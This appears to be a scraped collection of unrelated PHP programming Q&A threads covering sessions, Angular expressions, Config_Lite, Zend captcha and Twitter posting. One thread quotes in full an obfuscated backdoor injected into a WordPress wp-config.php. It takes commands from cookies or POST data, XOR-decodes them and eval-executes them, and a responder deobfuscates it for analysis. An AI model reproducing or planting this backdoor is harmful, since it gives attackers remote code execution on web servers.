I have a huge problem which I can't seem to fix. I got 2 files. insertDB.php(for writing content into my database) & mail.php(for sending me a mail if something got written into databse). Because I don't want the mail stuff in the same file as the SQL-Statements, I created the mail.php file.
Now I want to pass Variables or an Array from insertDB to mail. It works in every other file I'm using but it's not working here.
<?php
//insertDB.php
Session_Start();
include 'dbconnect.php';
$login = $_SESSION['login'];
$num = $_mysqli->real_escape_string($_POST['num']);
$date = $_mysqli->real_escape_string($_POST['date']);
$user = $_mysqli->real_escape_string($_POST['user']);
$program = $_mysqli->real_escape_string($_POST['program']);
$name = $_mysqli->real_escape_string($_POST['name']);
$path = $_mysqli->real_escape_string($_POST['path']);
$mailData = [$num, $date, $user, $program, $name, $path];
$_SESSION['mailData'] = $mailData;
// var_dump($_SESSION['mailData']); <- outputs array WITH content
$insert = "INSERT INTO Zeichnungen (Num, Date, User, Program, Name, Path, Info, Leer)
VALUES ('$num', '$date', '$user', '$program', '$name', '$path', '', '$login')";
if ($_result = $_mysqli->query($insert)) {
header('Location: mail.php');
}
?>
<?php
//mail.php
Session_Start();
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
use PHPMailer\PHPMailer\SMTP;
include '/opt/composer/vendor/autoload.php';
include 'insertDB.php';
$login = $_SESSION['login'];
var_dump($_SESSION['mailData']);
?>
/* Output I see in Browser from mail.php -> var_dump($_SESSION['mailData']); : */
array(6) { [0]=> string(0) "" [1]=> string(0) "" [2]=> string(0) "" [3]=> string(0) "" [4]=> string(0) "" [5]=> string(0) "" }
What is the problem? Why does it have no content but the 6 keys?
Any help appreciated.
Looking at the code, there is nothing obvious to me that can cause var_dump() to print 6 empty strings. Running the provided code does not reproduce your problem (despite unnecessarily calling start_session() again, but that has no effect other than a warning).
This is difficult to debug this way. Don't use the session for this if this data does not survive through multiple requests. If you don't want to use classes, at least pass the data to functions with one responsibility. Using the session to store these variables is not a good practice. It is unnecessary global state and will eventually make this code even more difficult to follow and debug.
You have several examples in http://php.net/manual/en/functions.user-defined.php. Define the functions in one file and note that you must include that file before being able to use them. Do not mix concerns, ie: your mail function should not set HTTP headers, and your database function should not access the $_SESSION or $_POST variables.
For example, in insertIntoDb.php (less fields for clarity) and using functions:
<?php
// ... (necessary mysqli includes, etc.)
function insertIntoDB(array $formData) {
// we escape the data here, this escaping is DB specific.
$num = $_mysqli->real_escape_string($formData['num']);
$date = $_mysqli->real_escape_string($formData['date']);
$login = $formData['login'];
$insert = "
INSERT INTO SomeTable (Num, Date, Login)
VALUES ('$num', '$date', '$login');
";
// it's better not to have other side effects here
// if everything goes right, we just continue
$result = $_mysqli->query($insert);
if (!$result) {
die("Database error");
}
}
In your mail.php file:
<?php
include 'insertIntoDb.php';
include 'sendEmail.php';
// we read the POST and other values here
// constructing an associative array is an
// option if not using objects.
$formData = [
'num' => $_POST['num'],
'date' => $_POST['date'],
'login' => $_SESSION['login'],
];
// using the functions
insertIntoDb($formData);
sendEmail($formData); // defined in sendEmail.php, not in example.
// this point is reached when everything works,
// no need to control flow...
header('Location: success.php'); // perhaps "thanks" message.
as many have said, the code is clean and should work. The other possible culprit is the following line
header('Location: mail.php');
The php function header() clears all GETs & POSTs when client leaves current page.
Instead make mail.php a function then include mail.php in insertDB.php
NB: try to adopt OOP coding particulary when dealing with PHP
Related
For instance
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change from string to int
var_dump($user_post_int_id); // gives int(1) 0, I don't know why isn't type conversion working!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out the 0
So the main problem I think is of type conversion, as I tried one more thing where String(1) is converting to int(1) with no problem but with string(16) everything blows apart and results to 0.
i got 3 suggestion 4u (on my server all works fine)
as a original with my comments:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change to int
var_dump($user_post_int_id);
// gives int(1) 1, is not test your php/server conf!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out 1
then i advise you to try with your code, run on your server with changes:
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int){{list.user.id}};
//hopes your php wudn't show an error
replace $user_post_int_id = (int)$user_post_id;
to $user_post_int_id = floor((int)$user_post_id);
or $user_post_int_id = ceil((int)$user_post_id);
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int)({{list.user.id}}) + 1 ;
or plus zero, these hack sometimes works for me !
p.s. (int) can do a trick with you, php can thout that you uses hex bin or smth else. retest it twice !
php.net/manual/en/language.types.integer.php
php.net/manual/en/language.types.type-juggling.php
You cannot use Angular expression inside a server side statements, as Angular statement runs on client side after running all server logic.
In your code:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}" //list.user.id is a JS variable, you cannot use it in PHP.
$user_post_int_id = (int)$user_post_id; // something wrong here, you do not need this step, normally if you retrieved the code from server side.
{{ $user_post_int_id }} //this should not work
But still this blade function fails
#if(Auth::user()->id == $user_post_int_id)
do something //returns false, makes alot of sense, as again you are trying to get variables from JS and passing them to PHP scripts. This will never work.
#endif
my friend's wordpress wp-config.php was added with one line of code:
$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);#$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=#$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>#$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo#$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}
What does it means?
I've tried to change eval to print, but nothing shown.
https://eval.in/584427
By using a var_dump after the first statement with $_COOKIE I could see that the structure of the first array appears to contain several function names which are supposedly called later:
var_dump($ge142efa);
array(14) {
["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18 H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^#G,n]\;MXv?5){}Rcowfjb>A-"
["hfa2b"]=>
string(3) "chr"
["he58"]=>
string(3) "ord"
["ge19947"]=>
string(6) "strlen"
["xa2a5ede"]=>
string(7) "ini_set"
["k5051"]=>
string(9) "serialize"
["z2503c"]=>
string(10) "phpversion"
["i50830251"]=>
string(11) "unserialize"
["kf8736"]=>
string(13) "base64_decode"
["vc05"]=>
string(14) "set_time_limit"
["u491"]=>
string(4) "i461"
["v2298682"]=>
string(4) "g2bc"
["re5bf"]=>
string(6) "$_POST"
["j975"]=>
string(8) "$_COOKIE"
}
I have replaced the $_POST and $_COOKIE contents with strings as placeholders because my test environment is php -f inside a container.
The part between this array and the first function declaration boils down to this:
#ini_set('error_log', NULL); // #$ge142efa['xa2a5ede']('error_log', NULL);
#ini_set('log_errors', 0); // #$ge142efa['xa2a5ede']('log_errors', 0);
#ini_set('max_execution_time', 0); // #$ge142efa['xa2a5ede']('max_execution_time', 0);
#set_time_limit(0); // #$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';
The first function reads thus:
function g2bc($tf027f, $p7ec){
global $ge142efa;
$de211af = "";
for($i = 0; $i < "strlen"($tf027f);){
for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
$de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
}
}
return $de211af;
}
It appears to xor two strings and return the result.
The function below that, i461, uses it twice:
function i461($tf027f, $p7ec){
global $ge142efa;
global $m001c8475;
return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}
The code below these two functions
can be beautified to this:
foreach($_COOKIE as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
if(!$tf027f){
foreach($_POST as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
}
$tf027f =# "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
if($tf027f["a"] == "i"){
$z225cd560 = Array("pv" => #"phpversion"(), "sv" => "1.0-1",);
echo#"serialize"($z225cd560);
}elseif($tf027f["a"] == "e"){
eval($tf027f["d"]);
}
exit();
}
The critical part here is the eval. From my point of view this looks like code that executes something given by the right combination of $_COOKIE and/or $_POST. Basically a portion of code waiting to get the right request and execute the code specified by it.
I'm Just dealing with same issue. Your friend's have to make some changes. May be IP Address is traced by some person & he is doing some changes in database and it's affecting your front end and code also.
- If you have backup of database then change the database.
- Install some security Plugin like All In One WP Security & Firewall.
(Because if IP is traced again than it may help in future).
Some other changes.
Search Images path in database may be it contains malware.
Remove unused script from code.
Change Admin panel login credential.
Change Cpanel credential.
Below is my Save Configuration file:
<?php
require_once 'Config/Lite.php';
$config = new Config_Lite();
$config->read('/var/www/html/svnmanager/Config/testing');
$config->set('/lol', 'user', 'JohnDoe')
->set('/lol', 'password', 'lemo')
->set('db2', 'user', '');
// set with ArrayAccess
$config['general'] = array('lang' => 'fr');
echo $config;
$config->save();
?>
and following is the output:
debug = ""
[db]
user = "JohnDoe"
password = "d0g1tcVs$HgIn1"
[db2]
user = ""
password = "d0g1tcVs$HgIn1"
[general]
lang = "fr"
[/lol]
user = "JohnDoe"
password = "ddada"
How do remove the double qoutes when saving the file?
for example:
[/lol]
user = JohnDoe
password = ddada
Add
$config->setQuoteStrings(false);
before saving it to the file
I'm going to start off with a rant: You are always better off using FLOSS libraries as intended/documented rather than hacking them to do what you want, if at all possible - even when the code is the only documentation available. For example, if a new version of Config_Lite comes out and you upgrade to that, you'll have "lost" your fixes.
(And, as if to prove my point, version 0.2.0 was released today at http://pear.php.net/package/Config_Lite/download/0.2.0)
To be more specific to answering your question, you need to call the setQuoteStrings method before you either explicitly save the .ini file output to a file using the write method or do anything that treats $config as a string value.
Typically, I'd do things in this order:
Create the [config] object first.
Set whatever options applicable (such as turning off quoted strings in this case)
Call whatever other methods as required (e.g. set values to sections etc)
Use resultant object (e.g. save the .ini file)
tl;dr:
$config = ....
$confg->setQuoteStrings(false);
$config->set(...);
echo $config;
$config->save();
Found myself a solution. You need to change the protected $quoteStrings = true; to protected $quoteStrings = false; in your Lite.php file :)
My post data is from Captcha adapter is as following:
["ffck"] => array(2) {
["id"] => string(32) "661db3996f5e60e71a60671496ec71a9"
["input"] => string(3) "dys"
}
My code is trying to validate now, but always failing:
Zend_Loader::loadClass('Zend_Captcha_Image');
$captcha = new Zend_Captcha_Image();
$captchaArray = array(
'id' => $post['ffck']['id'], // valid id
'input' => $post['ffck']['input'] // valid input
);
if ($captcha->isValid($captchaArray)) { // FAILs!!!!
echo "working";
} else {
echo "fails";
}
Zend_Debug::dump($post) ; // 100% valid ....
exit;
How to fix it? Or whats causing this to fail?
Check the generated html, you should only have two inputs: name="captcha[id]" and name="captcha[input]", if you have a third one with name="captcha", then you have to remove the viewhelper from the captcha element before rendering.
Ex.:
$form->getElement('captcha')->removeDecorator("viewhelper");
The array you pass to the CAPTCHA object should just contain the two keys, so try:
$captchaArray = $post['ffck']
instead of what you are currently doing.
But the code you've posted is not valid anyway since you never generate the CAPTCHA image. I imagine you've cut down the code sample to keep the question short, so if the above fix doesn't work please edit your example to include how and where the CAPTCHA image is generated.
I am using a twitter class to post updates to my account for this I have removed my twitter credentials so I am aware that XXXXX is wrong. I am able to parse the text from the remote xml file. This xml files text always reads "There are no active codes." So in my if statement i said that if the xml file reads "There are no active codes." i dont want to post anything to my twitter, but if it changes to anything else then i would like to parse that information and post it to my twitter. So today when there was an update to the xml file nothing happened. I know that the twitter portion is correct because I have a similar script that does not use an if statement and it posts fine. Once i introduced the if statement i have run into problem of not being able to post. So what can i do to post to twitter only when the xml file changes from "There are no active codes." to anything else?
// Parse Message
$source = file_get_contents('WEBSITE_URL_GOES_HERE');
$dom = new DOMDocument();
#$dom->loadHTML($source);
$xml = simplexml_import_dom($dom);
$match = $xml->xpath("//code_message");
//Twitter class (Updating status)
require_once 'twitteroauth.php';
//Twitter credentials
define("CONSUMER_KEY", "XXXXXX");
define("CONSUMER_SECRET", "XXXXXX");
define("OAUTH_TOKEN", "XXXXXX-XXXXXX");
define("OAUTH_SECRET", "XXXXXX");
// Verify credentials
$connection = new TwitterOAuth(CONSUMER_KEY, CONSUMER_SECRET, OAUTH_TOKEN, OAUTH_SECRET);
$content = $connection->get('account/verify_credentials');
//If Statement
if ( $match[0] == "There are no active codes." ) {
/* Do Nothing */;
} else {
$connection->post('statuses/update', array('status' => 'New Code Available - ' . $match[0] ));
return $connection;
}
var_dump of the $match array:
array(1) { [0]=> object(SimpleXMLElement)#3 (1) { [0]=> string(32) "There are no active codes." } }
You should probably use a string comparison function.
like strcmp : http://php.net/manual/en/function.strcmp.php
if (strcmp($match,"There are no active codes.") != 0 )
{
$connection->post('statuses/update', array('status' => 'New Code Available - ' . $match[0] ));
return $connection;
}
Why don't you just add some debugging code and check what's going on? Echo you $match[0] and check what's in there. It's hard to imagine "if" being broken, isn't it? Maybe var_dump($match) just to check what's going on. Then you should probably either fix your condition or fix the retrieval of $match.
Check your array: the [0] element is an object, not a string. You need to get the first element of that object, if you know what I mean.
You are comparing:
Object(SimpleXMLElement)#3 (1) { [0]=> string(32) "There are no active codes." }
to
"There are no active codes."
Which is obviously not the same.
I can't test it from here, but check out the manual of simpelXMLElement: http://php.net/manual/en/class.simplexmlelement.php
You should probably get away with a simple call. Just check out what kind of object you have. A simple example would be something like "$match[0]->childname", but I can't quickly see what the childname is. Check out the manual for some sort of getchild or something, shouldn't be too tricky